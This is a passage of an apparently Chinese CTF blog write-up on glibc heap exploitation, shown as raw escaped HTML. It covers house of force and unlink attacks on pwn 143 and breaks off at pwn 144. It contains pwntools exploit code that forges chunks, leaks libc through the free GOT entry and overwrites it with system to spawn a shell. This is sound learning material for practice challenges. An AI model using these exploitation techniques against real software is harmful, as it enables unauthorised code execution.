id=\"ua499153b\">delete\u6389chunk2\uff0c\u4e5f\u5c31\u662f\u7f16\u53f7\u4e3a1\uff08\u4ece0\u5f00\u59cb\uff09\u7684chunk\u540e\uff0c\u56de\u5230pwndgb\u8f93\u5165bins\u67e5\u770b\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/@DSWG2N9OMPCUJ_5VZNQ.png'><img 
class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"276\" height=\"249\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/@DSWG2N9OMPCUJ_5VZNQ.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-241\"\/><\/div><\/figure>\n\n\n\n<p id=\"uf3cdd3d6\">\u91ca\u653e\u6389\u4e86chunk2\u7ed3\u6784\u4f53\u8ddfchunk2\u7684content\uff0c\u4f46\u662f\u7f6e\u7a7a\u53ea\u7f6e\u7a7a\u4e86chunk2\u7ed3\u6784\u4f53\u3002\u7136\u540e\u7533\u8bf7\u4e00\u4e2achunk3, \u5927\u5c0f\u662f0x30,\u624b\u8f93payload\u6709\u70b9\u95ee\u9898\uff0c\u4e8e\u662f\u6211\u5728\u811a\u672c\u8f93payload\u540e attach\uff0c\u5c31\u4f1a\u81ea\u52a8\u5f39\u51fa\u6765pwngdb\uff0c\u7136\u540e\u518d\u770b\u5806\u5185\u5b58\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/6KVTA_Y_LBX1UE.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"600\" height=\"63\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/6KVTA_Y_LBX1UE.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-242\"  sizes=\"auto, (max-width: 600px) 100vw, 600px\" 
\/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/EC9SVNF5Y9UXG1XC.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"546\" height=\"318\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/EC9SVNF5Y9UXG1XC.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-243\"  sizes=\"auto, (max-width: 546px) 100vw, 546px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ua781bddd\">\u53ef\u4ee5\u770b\u5230\uff0c0x602018\u5c31\u662ffree_got\u7684\u5730\u5740\uff08\u8fd8\u4e0d\u662ffree\u7684\u5730\u5740\uff0c\u90a3\u91cc\u5b58\u7684\u503c\u624d\u662ffree\u7684\u5730\u5740\uff09,\u7ee7\u7eed\u8ddf\u8fdb\uff0c\u53ef\u4ee5\u770b\u5230free\u7684\u771f\u5b9e\u5730\u5740:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/OTJNYFW5GDH9@NPDWN8X.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"729\" height=\"411\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/OTJNYFW5GDH9@NPDWN8X.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-244\"  sizes=\"auto, (max-width: 729px) 100vw, 729px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u3aac6c2e\">\u63a5\u6536\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/H_X9XR0V3VT06N5WCB1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"450\" height=\"60\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/H_X9XR0V3VT06N5WCB1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-245\" style=\"width:743px;height:auto\"  sizes=\"auto, (max-width: 450px) 100vw, 450px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ue32d33bf\">\u6b64\u65f6\u62ff\u5230\u4e86free\u5730\u5740\uff0c\u5c31\u53ef\u4ee5\u7528\u57fa\u5740\u8ba1\u7b97\u51fasystem\u7684\u5730\u5740\uff0c\u6211\u4e00\u5f00\u59cb\u7528libcsearch\u641e\u4e0d\u5b9a\uff0c\u90a3\u5c31\u53ea\u80fd\u7528\u672c\u5730\u7684\u5e93\u3002<\/p>\n\n\n\n<p id=\"u3f311bfd\">\u672c\u5730\u7684\u5e93\u6709\u65f6\u5019\u4e5f\u4f1a\u62a5\u9519\uff0c\u591a\u8bd5\u51e0\u6b21\u5c31\u4f1a\u6709\u4e00\u6b21\u6210\u529f\uff0c\u539f\u56e0\u672a\u77e5\u3002<\/p>\n\n\n\n<p 
id=\"u7136d114\">\u6211\u4eec\u73b0\u5728\u5df2\u7ecf\u5f97\u5230\u4e86system\u7684\u5730\u5740\uff0c\u63a5\u4e0b\u6765\u5c31\u662f\u8986\u5199\u67d0\u4e2a\u4f1a\u8c03\u7528\u7684\u51fd\u6570\u5730\u5740\u6210system\u5730\u5740\uff1a<\/p>\n\n\n\n<p id=\"u014e9155\">chunk3\u7684content\u6307\u9488\u6b64\u65f6\u662ffree_got\u5730\u5740\uff0c\u8c03\u7528edit_note\u5c31\u80fd\u5bf9free_got\u7684\u5185\u5bb9\u8fdb\u884c\u4fee\u6539\uff0c\u6539\u6210system\u771f\u5b9e\u5730\u5740\u5c31\u884c<\/p>\n\n\n\n<p id=\"uc030659a\">payload3=p64(system)<\/p>\n\n\n\n<p id=\"ube1f4fa3\">\u7136\u540e\u518d\u5f80chunk1\uff0c\u4e5f\u5c31\u662findex\u4e3a0\u7684note\u91cc\u9762\u5199\u5165\/bin\/sh\\x00,\u63a5\u7740delete\u5b83\uff0c\u5c31\u4f1a\u8c03\u7528free\u51fd\u6570\uff0c\u6b64\u65f6\u5b83\u5df2\u7ecf\u662fsystem\u51fd\u6570\u4e86\uff0c\u5c31\u4f1a\u6267\u884csystem(bin\/sh),\u62ff\u5230shell<\/p>\n\n\n\n<p id=\"uad0576e2\">\u8fd9\u91cc\u9996\u5148\u5207\u8bb0recvuntil\u4e00\u5b9a\u8981\u8d8a\u7ec6\u81f4\u8d8a\u597d\uff0c\u5c24\u5176\u662f\u591a\u4e2a\u5192\u53f7\u8fd9\u79cd\uff0c\u4e0d\u7136\u5bb9\u6613\u5bfc\u81f4\u6df7\u4e71\u3002<\/p>\n\n\n\n<p id=\"u31209628\">\u6bd4\u8f83\u5e7d\u9ed8\u7684\u662f\uff0c\u672c\u5730\u6253\u53ea\u80fd\u7528\u672c\u5730\u5e93\u624d\u80fd\u6253\u901a\uff0c\u6253\u8fdc\u7a0b\u53ea\u80fd\u7528libsearcher\u624d\u80fd\u6253\u901a\uff08\u90094\uff09\uff0c\u731c\u6d4b\u662f\u7248\u672c\u95ee\u9898.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/5A0RN447AJJVHIYJF-1024x504.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"504\" 
data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/5A0RN447AJJVHIYJF-1024x504.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-246\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"pwn_143_house_of_force\"><\/span>pwn 143 (house of force)<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/T5I2E_CE4RR9QLY-1024x514.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"514\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/T5I2E_CE4RR9QLY-1024x514.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-249\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u68e98816\">\u6bcf\u5f53\u6709\u4e00\u6b21malloc\u65f6\uff0c\u5982\u679cbins\u91cc\u9762\u6ca1\u6709\u5408\u9002\u7684chunk\u5206\u914d\uff0c\u5c31\u4f1a\u4ecetop chunk\u4e2d\u5272\u4e00\u5757\u51fa\u6765\uff0ctop chunk\u7684\u5730\u5740\u4e5f\u4f1a\u76f8\u5e94\u79fb\u52a8\uff0c\u90a3\u5982\u679cmalloc\u4e86\u4e00\u4e2a\u8d1f\u503c\u5462\uff1ftop 
chunk\u5c31\u4f1a\u5f80\u4f4e\u5730\u5740\u79fb\u52a8\uff0c\u5982\u679c\u8fd9\u4e2a\u8d1f\u503c\u662f\u53ef\u4ee5\u968f\u610f\u5206\u914d\u7684\uff0c\u4e5f\u5c31\u610f\u5473\u7740top chunk\u7684\u5730\u5740\u80fd\u6539\u5230\u4efb\u610f\u5730\u65b9\uff0c\u8fd9\u65f6\u5019\u518d\u7533\u8bf7chunk\uff0c\u5c31\u80fd\u8fbe\u5230\u4efb\u610f\u5730\u5740\u5199\u7684\u6548\u679c<\/p>\n\n\n\n<p id=\"u2f9c2674\">edit\u80fd\u6ea2\u51fa<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/BKS4Z9W_6@E8@SY19@3T-1024x688.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"688\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/BKS4Z9W_6@E8@SY19@3T-1024x688.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-250\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"uabe3c7b3\">delete\u65e0uaf\u6f0f\u6d1e<\/p>\n\n\n\n<p id=\"u6e8a2d8b\">\u6709\u540e\u95e8\u51fd\u6570<\/p>\n\n\n\n<p id=\"u713d7a46\">\u601d\u8def\u5c31\u662f\uff0c\u5148\u7533\u8bf7\u4e00\u4e2a0x30\u7684chunk\uff0c\u7136\u540eedit\u5b83\uff0c\u6ea2\u51fa\u4fee\u6539top chunk\u7684size\u4f4d\u4e3a-1\uff0c\uff08\u8fd9\u6837\u5c31\u80fd\u9003\u8fc7\u68c0\u67e5\u7533\u8bf7\u4e00\u4e2a\u8d1f\u503c\u7684chunk\uff09\uff0c\u63a5\u7740\u7533\u8bf7\u4e00\u4e2a\u7279\u5b9a\u8d1f\u503c\u7684chunk\uff0c\u4f7f\u5f97top 
chunk\u7684\u5730\u5740\u79fb\u52a8\u5230bye_message\u8fd9\u4e2achunk\u5904\uff0c\u7533\u8bf7\u4e00\u4e2achunk\uff0c\u4fee\u6539message chunk\u7684\u6307\u9488\u6307\u5411\u540e\u95e8\u51fd\u6570\uff0c\u7136\u540e5 exit\u5c31\u80fd\u8c03\u7528\u540e\u95e8\u51fd\u6570:<\/p>\n\n\n\n<p id=\"u5400aa4f\">#\u7533\u8bf7\u7b2c\u4e00\u4e2achunk\uff0c\u8fd9\u4e2achunk\u548ctop\uff1a<\/p>\n\n\n\n<p id=\"u91dde905\">add(0x30, b&#8217;aaaa&#8217;)<\/p>\n\n\n\n<p id=\"u5675e2d5\">#\u4fee\u6539top chunk\u7684size\u4f4d\u4e3a-1<\/p>\n\n\n\n<p id=\"ud2edfe96\">payload = 0x30 * b&#8217;a&#8217;<\/p>\n\n\n\n<p id=\"ufcf40141\">payload += b&#8217;a&#8217; * 8 + p64(0xffffffffffffffff)<\/p>\n\n\n\n<p id=\"uf2d959cb\">edit(0, 0x41, payload)<\/p>\n\n\n\n<p id=\"uc9fffda2\">#\u8ba1\u7b97top chunk\u5e94\u8be5\u79fb\u52a8\u7684\u5927\u5c0f\uff0c\u8fd9\u91cc\u4e0d\u662f\u5f88\u7406\u89e3\uff0c\u6309\u7406\u6765\u8bf4-0x60\u5c31\u591f\u4e86\uff0c\u4f46\u540e\u9762\u8fd8\u8981\u51cf\u53bb\u4e00\u4e2a\u503c\uff0c\u8fd9\u4e2a\u503c\u7ecf\u8fc7\u6d4b\u8bd5\uff0c\u57280x8-0x17\u4e4b\u95f4\u90fd\u53ef\u4ee5<\/p>\n\n\n\n<p id=\"ubc744a37\">offset = -0x60-0x17<\/p>\n\n\n\n<p id=\"u5ab04cba\">add(offset, b&#8217;aaaa&#8217;)<\/p>\n\n\n\n<p id=\"u2a3dded7\">#\u518d\u7533\u8bf7\u4e00\u4e2achunk\uff0c\u62ff\u5230message chunk\u7684\u5185\u5b58\uff0c\u4fee\u6539\u6307\u9488\u5373\u53ef<\/p>\n\n\n\n<p id=\"u691b186b\">add(0x10, p64(flag) * 2)<\/p>\n\n\n\n<p id=\"u091fd4e6\">get_flag()<\/p>\n\n\n\n<p id=\"uf18bbdce\">io.interactive()<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"pwn_143%E5%8F%A6%E4%B8%80%E7%A7%8D%E8%A7%A3%E6%B3%95%E9%87%8D%E8%A6%81unlink\"><\/span>pwn 143\u53e6\u4e00\u79cd\u89e3\u6cd5|\u91cd\u8981|unlink<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p id=\"ud7040b44\">unlink\u4ecb\u7ecd\uff1a<\/p>\n\n\n\n<p id=\"ua1cb313c\">\u5728free\u67d0\u4e2a\u5927\u5c0f\u4e0d\u5c5e\u4e8efast 
bin\u7684\u5728\u4f7f\u7528\u7684\u5806\u5757P\u65f6\uff0c\u4f1a\u89e6\u53d1\u5408\u5e76\u64cd\u4f5c\uff0c\u68c0\u67e5\u524d\u540e\u4e24\u4e2a\u7269\u7406\u76f8\u90bb\u5806\u5757P1\u3001P2\u662f\u4e0d\u662f\u7a7a\u95f2\uff0c\u5982\u679c\u662f\u7a7a\u95f2\uff0c\u5c31\u628aP1\/P2\u4ece\u539f\u672c\u6240\u5728\u7684bin\u4e2dunlink\u51fa\u6765\uff0c\u7136\u540e\u8ddfP\u5408\u5e76\uff0c\u5408\u5e76\u540e\u653e\u5165unsorted bin\u4e2d\u3002<\/p>\n\n\n\n<p id=\"u140b1ee8\">unlink\u64cd\u4f5c\u7684\u5173\u952e\u4e00\u6b65\u662f\uff0cFD=P-&gt;fd,BK=P-&gt;bk,FD-&gt;bk=BK,BK-&gt;fd=FD<\/p>\n\n\n\n<p id=\"u68692f2f\">\u5982\u679c\u628a\u5c06\u8981unlink\u7684\u90a3\u4e2a\u5806\u5757\uff08\u5373P\uff09\u7684fd\u548cbk\u6307\u9488\u4fee\u6539\u4e86\uff0c FD\u6307\u5411\u9700\u8981\u6539\u53d8\u503c\u7684\u5730\u5740\uff0cBK\u6307\u5411\u60f3\u8981\u6539\u6210\u7684\u503c\uff0c\u5f53FD-&gt;bk=BK\u540e\uff0c\u5c31\u5b9e\u73b0\u4e86\u503c\u7684\u7be1\u6539\u3002\u4f46\u662f\u6ce8\u610f\uff0cFD-&gt;bk\u5b57\u6bb5\u4f4d\u4e8eFD+12\u5904(32\u4f4d\uff0csize+prevsize+fd\u5404\u5360\u56db\u5b57\u8282)\uff0c\u6240\u4ee5\u7be1\u6539\u7684\u5730\u5740\u5e94\u8be5\u8981-12\uff0c\u8fd9\u6837\u624d\u80fd\u5b9e\u73b0\u6b63\u786e\u7684\u6307\u5411\u3002<\/p>\n\n\n\n<p id=\"u1adcb4bd\">\u4f46\u662f\u8fd9\u6837\u53ea\u6709\u5728\u4f4e\u7248\u672c\u4e2d\u884c\u5f97\u901a\uff0c\u9ad8\u7248\u672c\u4e2d\u65b0\u589e\u4e86\u68c0\u67e5\uff0c\u5728unlink\u524d\uff0c\u5148\u786e\u5b9aFD-&gt;bk=P\uff0cBK-&gt;fd=P\uff0c\u4ee5\u9632\u6b62\u4f2a\u9020chunk\u3002\u8fd9\u6837\u7684\u8bdd\u4e0a\u9762\u7684\u529e\u6cd5\u660e\u663e\u5c31\u901a\u4e0d\u8fc7\u68c0\u67e5\u4e86\u3002\u4e8e\u662f\u6709\u4e86\u53e6\u4e00\u79cd\u601d\u8def\uff1a\uff0832\u4f4d\uff09<\/p>\n\n\n\n<p id=\"u49de5fc9\">\u65e2\u7136\u8981\u4fdd\u8bc1FD-&gt;bk=P\uff0cBK-&gt;fd=P\uff0c\u90a3\u5c31\u76f4\u63a5\u8ba9FD=P-12,BK=P-8\u5c31\u884c\u4e86\uff0c\u8fd9\u6837<\/p>\n\n\n\n<p id=\"u9e84d62a\">FD-&gt;bk=FD+12=P<\/p>\n\n\n\n<p id=\"u261b4774\">BK-&gt;fd=BK+8=P<\/p>\n\n\n\n<p 
id=\"u4ab72c04\">\u5c31\u7ed5\u8fc7\u4e86\u68c0\u6d4b\uff0c\u6267\u884c\u5b8cunlink\u540e\uff0cFD-&gt;bk=BK,BK-&gt;fd=FD,\u6700\u540e\u5c31\u662fP=P-12\uff0cP\u6307\u9488\u6307\u5411\u4e86\u6bd4\u81ea\u5df1\u4f4e12\u5904.<\/p>\n\n\n\n<p id=\"u835617b2\">\u7ea2\u5b57\u6709\u8bef\uff0c\u6b63\u786e\u7684\u8868\u8fbe\u5e94\u8be5\u662f\uff0cP\u6307\u9488\u5904\u7684\u503c\u53d8\u6210P\u6307\u9488-12<\/p>\n\n\n\n<p id=\"u51ca3d73\">\u6307\u9488\u53ef\u4ee5\u7406\u89e3\u6210\u4e00\u4e2a\u5730\u5740\uff0c\u6bd4\u5982P\u6307\u9488=0x400400,0x400400\u5904\u5b58\u653e\u7684\u503c\u4e3a0x600600,\u8fd9\u4e2a\u503c\u672c\u6765\u662fchunk0\u6240\u5728\u5730\u5740\u7684\uff0c\u4f46\u662funlink\u653b\u51fb\u540e0x400400\u5904\u7684\u503c\u53d8\u6210\u4e860x400400-12\uff0c\u53ef\u4ee5\u7406\u89e3\u6210 \u628a chunk \u79fb\u5230\u5b58\u50a8 chunk \u6307\u9488\u7684\u5185\u5b58-12\u5904\u3002\u8fd9\u6837\u4e0b\u4e00\u6b21edit\u8fd9\u4e2achunk\u7684\u65f6\u5019\u5c31\u80fd\u7be1\u65390x400400\u5904\u7684\u503c\u4e3a\u81ea\u5df1\u60f3\u8981\u7684\u503c\uff0c\u518dshow\u51fa\u6765\u5c31\u80fd\u6cc4\u9732\u5185\u5b58\u5730\u5740\u3002\u800c\u5982\u679c\u518dedit\u4e00\u6b21\uff0c\u7531\u4e8e\u6b64\u65f60x400400\u5904\u7684\u503c\u5df2\u7ecf\u53d8\u6210\u4e86\u6cc4\u9732\u5185\u5b58\u5730\u5740\u7684\u503c\uff0c\u90a3\u5c31\u76f8\u5f53\u4e8e\u5bf9\u8fd9\u4e2a\u5730\u5740\u76f4\u63a5\u5199\u4e86\u3002<\/p>\n\n\n\n<p id=\"uef9c7432\">add(0x40,&#8217;aaaaaaaa&#8217;)#0<\/p>\n\n\n\n<p id=\"uf6622de7\">add(0x80,&#8217;bbbbbbbb&#8217;)#1<\/p>\n\n\n\n<p id=\"ufcd419ae\">add(0x80,&#8217;cccccccc&#8217;)#2<\/p>\n\n\n\n<p id=\"u4675675f\">add(0x20,&#8217;\/bin\/sh\\x00&#8242;)<\/p>\n\n\n\n<p id=\"uf3a88c57\">ptr=0x6020a8<\/p>\n\n\n\n<p id=\"u81f4a720\">fd=ptr-0x18<\/p>\n\n\n\n<p id=\"u0b8a4f34\">bk=ptr-0x10<\/p>\n\n\n\n<p id=\"ud311c1c4\">#fakechunk<\/p>\n\n\n\n<p id=\"u6f518e28\">fakechunk=p64(0)#prevsize<\/p>\n\n\n\n<p id=\"ud28d567e\">fakechunk+=p64(0x41) #size<\/p>\n\n\n\n<p 
id=\"u145a6837\">fakechunk+=p64(fd)<\/p>\n\n\n\n<p id=\"u0bf18c30\">fakechunk+=p64(bk)<\/p>\n\n\n\n<p id=\"u5ca83860\">fakechunk+=b&#8217;\\x00&#8217;*0x20<\/p>\n\n\n\n<p id=\"u40719ebe\">fakechunk+=p64(0x40)#chunk1&#8217;s prevsize,0x40 means chunk0 is 0x40 and in free<\/p>\n\n\n\n<p id=\"uf15cf518\">fakechunk+=p64(0x90)#chunk1&#8217;s size<\/p>\n\n\n\n<p id=\"u0ca6830b\">edit(0,len(fakechunk),fakechunk)<\/p>\n\n\n\n<p id=\"u9c1ea352\">#gdb.attach(io)<\/p>\n\n\n\n<p id=\"u898dffb8\">delete(1) #then chunk0 will unlink<\/p>\n\n\n\n<p id=\"u744a2369\">payload=p64(0)*2+p64(0x40)+p64(elf.got[&#8220;free&#8221;])<\/p>\n\n\n\n<p id=\"u18661311\">edit(0,len(fakechunk),payload)<\/p>\n\n\n\n<p id=\"u1e967a18\">#gdb.attach(io)<\/p>\n\n\n\n<p id=\"u916c8e0b\">show()<\/p>\n\n\n\n<p id=\"ue3efd8c8\">free = u64(io.recvuntil(b&#8221;\\x7f&#8221;)[-6: ].ljust(8, b&#8217;\\x00&#8242;))<\/p>\n\n\n\n<p id=\"ua91eebb7\">log.info(&#8220;free addr is:%x&#8221;,free)<\/p>\n\n\n\n<p id=\"u524e7947\">libc = LibcSearcher(&#8216;free&#8217;,free)<\/p>\n\n\n\n<p id=\"u98196234\">libc_base = free &#8211; libc.dump(&#8216;free&#8217;)<\/p>\n\n\n\n<p id=\"u1030f7a3\">system = libc_base + libc.dump(&#8216;system&#8217;)<\/p>\n\n\n\n<p id=\"u4ad4909b\">edit(0,0&#215;8,p64(system))<\/p>\n\n\n\n<p id=\"u9884a675\">delete(3)<\/p>\n\n\n\n<p id=\"uac5f4870\">io.interactive()<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"pwn_144\"><\/span>pwn 144<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/FUBE6SNHJ9DF56T@9RCUC-1024x561.png'><img class=\"lazyload lazyload-style-1\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"561\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/FUBE6SNHJ9DF56T@9RCUC-1024x561.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-251\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p 